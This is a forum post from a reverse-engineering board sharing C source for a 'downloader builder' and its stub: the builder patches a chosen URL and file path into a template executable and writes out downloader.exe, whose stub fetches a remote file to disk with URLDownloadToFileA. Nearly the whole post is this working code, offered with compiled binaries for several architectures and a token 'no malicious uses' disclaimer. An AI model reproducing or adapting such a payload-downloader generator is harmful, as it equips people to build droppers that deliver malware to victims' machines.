Exetools  

Go Back   Exetools > General > Source Code

Notices

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old 09-18-2021, 23:09
YANiS YANiS is offline
Guest
 
Join Date: Sep 2021
Posts: 2
Rept. Given: 0
Rept. Rcvd 0 Times in 0 Posts
Thanks Given: 0
Thanks Rcvd at 5 Times in 2 Posts
YANiS Reputation: 0
Tiny Basic Downloader Builder (Proof of Concept)

PHP Code:
/*
    MSVC
    Tiny Basic Downloader Builder (Proof of Concept)
    by YANiS

    This code snippet is provided 'as is' without warranty of any kind.
    No malicious uses are allowed.
*/

#include <windows.h>
#include "resource.h"

BOOL CALLBACK DlgProc(HWND hwndUINT uMsgWPARAM wParam,LPARAM lParam) {

    
unsigned char url[50] = {0};
    
unsigned char path[50] = {0};

    switch (
uMsg) {
    case 
WM_CLOSE:
        
EndDialog(hwnd0);
        break;

    case 
WM_INITDIALOG:
        
SetWindowTextA(hwnd"Basic Downloader Builder (Proof of Concept)");
        
SendDlgItemMessageA(hwndIDC_URLEM_LIMITTEXT500);
        
SendDlgItemMessageA(hwndIDC_PATHEM_LIMITTEXT500);
        
SetFocus(GetDlgItem(hwndIDC_URL));
        return 
FALSE;

    case 
WM_COMMAND:
        switch(
LOWORD(wParam)) {

        case 
IDB_BUILD:

            if((
GetDlgItemTextA(hwndIDC_URL, (LPSTR)url50+1) < 5) || (GetDlgItemTextA(hwndIDC_PATH, (LPSTR)path50+1) < 5) ) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: URL or PATH error!");
                return 
1;
            }

            
unsigned char *lpBuffer NULL;
            
size_t fileSize 0;

            
HANDLE hFile CreateFileA("stub.bin",
                                       
GENERIC_READ,
                                       
FILE_SHARE_READ,
                                       
NULL,
                                       
OPEN_EXISTING,
                                       
FILE_ATTRIBUTE_NORMAL,
                                       
NULL);

            if (
hFile == INVALID_HANDLE_VALUE) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: CreateFile error!");
                return 
1;
            }

            
fileSize GetFileSize(hFile0);
            if (
fileSize == 0) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: GetFileSize error!");

                
CloseHandle(hFile);
                return 
1;
            }

            
lpBuffer = (unsigned char *)VirtualAlloc(NULL,
                       
fileSize,
                       
MEM_COMMIT,
                       
PAGE_READWRITE);

            if (
lpBuffer == NULL) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: VirtualAlloc error!");
                
CloseHandle(hFile);
                return 
1;
            }

            
DWORD bytesRead;
            if (!
ReadFile(hFile,
                          
lpBuffer,
                          
fileSize,
                          &
bytesRead,
                          
NULL) || bytesRead != fileSize) {

                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: ReadFile error!");
                return 
1;
            }
            
CloseHandle(hFile);
            
#ifdef _WIN64
            
strcpy((char*)(lpBuffer 0x230), (char*)url);  // for stub 64-bit
            
strcpy((char*)(lpBuffer 0x268), (char*)path); // for stub 64-bit
#else            
            
strcpy((char*)(lpBuffer 0x218), (char*)url);  // for stub 32-bit
            
strcpy((char*)(lpBuffer 0x24C), (char*)path); // for stub 32-bit
#endif

            
hFile CreateFileA("downloader.exe",
                                
GENERIC_WRITE,
                                
0,
                                
NULL,
                                
CREATE_ALWAYS,
                                
FILE_ATTRIBUTE_NORMAL,
                                
NULL);

            if (
hFile == INVALID_HANDLE_VALUE) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: WriteFile error!");
                return 
1;
            }

            
DWORD bytesWritten;
            
WriteFile(hFile,
                      
lpBuffer,
                      
fileSize,
                      &
bytesWritten,
                      
NULL);

            
CloseHandle(hFile);

            
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: FINISHED");
            break;
        }
    default:
        return 
FALSE;
    }
    return 
TRUE;
}

int main() {
    
DialogBoxParamA(GetModuleHandleA(NULL),
                    
MAKEINTRESOURCE(IDD_BUILDER),
                    
NULL,
                    (
DLGPROC)DlgProc,
                    (
LPARAM)NULL);
    return 
0;

PHP Code:
/*
    MSVC
    Tiny Basic stub with markers
    by YANiS

    This code snippet is provided 'as is' without warranty of any kind.
    No malicious uses are allowed.
*/

#include <windows.h>
#include <urlmon.h>

#define URL_MARKER            "[url_marker......................................]"
#define FILE_PATH_MARKER    "[file_marker.....................................]"

void main() {

    
URLDownloadToFileA(NULL,                // LPUNKNOWN pCaller,
                       
URL_MARKER,            // LPCSTR szURL,
                       
FILE_PATH_MARKER,    // LPCSTR szFileName,
                       
0,                    // DWORD dwReserved,
                       
NULL);                // LPBINDSTATUSCALLBACK lpfnCB

    
MessageBoxA(NULL,
                
URL_MARKER,
                
FILE_PATH_MARKER,
                
MB_ICONINFORMATION);


    
ExitProcess(0);

Source and binaries (X86, X64, arm32 and arm64) attached.
Attached Files
File Type: rar tiny_builder_stub_POC.rar (10.7 KB, 10 views)
Reply With Quote
The Following User Says Thank You to YANiS For This Useful Post:
Stingered (09-20-2021)
 

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On


Similar Threads
Thread Thread Starter Forum Replies Last Post
Obfuscation - Proof of concept auroras General Discussion 8 04-13-2005 21:41


All times are GMT +8. The time now is 08:15.


Always Your Best Friend: Aaron, JMI, ahmadmansoor, ZeNiX, chessgod101
( 1998 - 2024 )